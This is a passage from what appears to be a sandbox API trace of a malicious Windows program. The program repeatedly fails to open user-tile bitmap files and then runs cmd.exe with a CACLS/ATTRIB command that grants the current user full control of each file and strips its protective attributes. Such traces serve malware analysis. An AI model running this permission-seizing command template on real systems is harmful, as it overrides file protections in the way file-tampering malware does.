%s") returned 0x19 [0185.107] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.108] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.108] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.108] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.108] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.108] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.109] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", lpFilePart=0x12eab4*="usertile24.bmp") returned 0x52 [0185.109] GetLastError () returned 0x5 [0185.109] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.109] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.109] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.109] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.109] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.109] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.109] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.109] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.109] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd44, dwThreadId=0x8ec)) returned 1 [0185.111] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.466] CloseHandle (hObject=0x1b4) returned 1 [0185.466] CloseHandle (hObject=0x120) returned 1 [0185.466] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.467] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", lpFilePart=0x12eab4*="usertile24.bmp") returned 0x52 [0185.467] GetLastError () returned 0x5 [0185.467] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.467] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.467] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.467] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.467] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.467] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.467] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.467] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.467] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.468] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.468] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.468] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.468] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", lpFilePart=0x12eab4*="usertile25.bmp") returned 0x52 [0185.468] GetLastError () returned 0x5 [0185.468] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.468] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.468] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.468] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.468] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.468] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.468] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.468] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.468] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf70, dwThreadId=0xe70)) returned 1 [0185.470] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.615] CloseHandle (hObject=0x1b4) returned 1 [0185.615] CloseHandle (hObject=0x120) returned 1 [0185.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.615] ReleaseMutex (hMutex=0xf8) returned 1 [0185.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.615] ReleaseMutex (hMutex=0xf8) returned 1 [0185.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.616] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", lpFilePart=0x12eab4*="usertile25.bmp") returned 0x52 [0185.616] GetLastError () returned 0x5 [0185.616] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.616] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.616] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.616] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.616] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.616] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.616] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.616] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.616] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.617] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.617] ReleaseMutex (hMutex=0xf8) returned 1 [0185.617] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.617] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", lpFilePart=0x12eab4*="usertile26.bmp") returned 0x52 [0185.617] GetLastError () returned 0x5 [0185.617] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.617] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.617] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.617] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.617] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.617] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.617] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.617] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.617] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe9c, dwThreadId=0xe5c)) returned 1 [0185.619] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.960] CloseHandle (hObject=0x1b4) returned 1 [0185.961] CloseHandle (hObject=0x120) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.961] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", lpFilePart=0x12eab4*="usertile26.bmp") returned 0x52 [0185.961] GetLastError () returned 0x5 [0185.961] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.961] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.961] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.961] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.961] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.962] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.962] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.962] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.962] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.963] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", lpFilePart=0x12eab4*="usertile27.bmp") returned 0x52 [0185.963] GetLastError () returned 0x5 [0185.963] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.963] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.963] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.963] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.963] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.963] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.963] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.963] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.963] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xdac, dwThreadId=0x8fc)) returned 1 [0185.965] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] CloseHandle (hObject=0x1b4) returned 1 [0186.141] CloseHandle (hObject=0x120) returned 1 [0186.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] ReleaseMutex 